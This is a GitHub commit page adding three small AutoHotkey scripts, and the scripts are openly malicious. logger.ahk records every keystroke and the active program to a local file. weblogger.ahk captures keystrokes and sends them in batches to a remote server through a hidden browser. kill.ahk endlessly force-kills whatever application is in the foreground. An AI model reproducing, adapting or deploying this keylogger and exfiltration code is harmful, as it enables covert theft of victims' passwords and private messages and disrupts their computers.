Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
Lyricstorm authored Jun 3, 2017
1 parent 4966c94 commit 98170f7
Show file tree
Hide file tree
Showing 3 changed files with 53 additions and 0 deletions.
6 changes: 6 additions & 0 deletions kill.ahk
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
loop
{
WinGet, OutputVar, ProcessName, A
SplitPath, OutputVar, OutNameNoExt
Run Taskkill /IM %OutNameNoExt% /F
}
25 changes: 25 additions & 0 deletions logger.ahk
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
Program :=
Loop
{
WinGet, Out, ProcessName, A
if(StrLen(Out) > 0)
{
if(Out != Program)
{
FileAppend,
(

%Out%
), log.txt
Program = %Out%
}}
Input, Key, L1 B T1 I V
FileAppend,
(

%Key%
), log.txt
}



22 changes: 22 additions & 0 deletions weblogger.ahk
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
store :=

Log(key)
{
url := "http://myserverorwhatever/folderorsomeshit/handler.php?key="key
browse := ComObjCreate("InternetExplorer.Application")
browse.Visible := false
browse.navigate(url)
while browse.Busy
sleep 1
browse.Quit
}
Loop
{
Input, key, B I L1 V
store = %store%%key%
if(StrLen(store) > 99)
{
Log(store)
store =
}
}

0 comments on commit 98170f7

Please sign in to comment.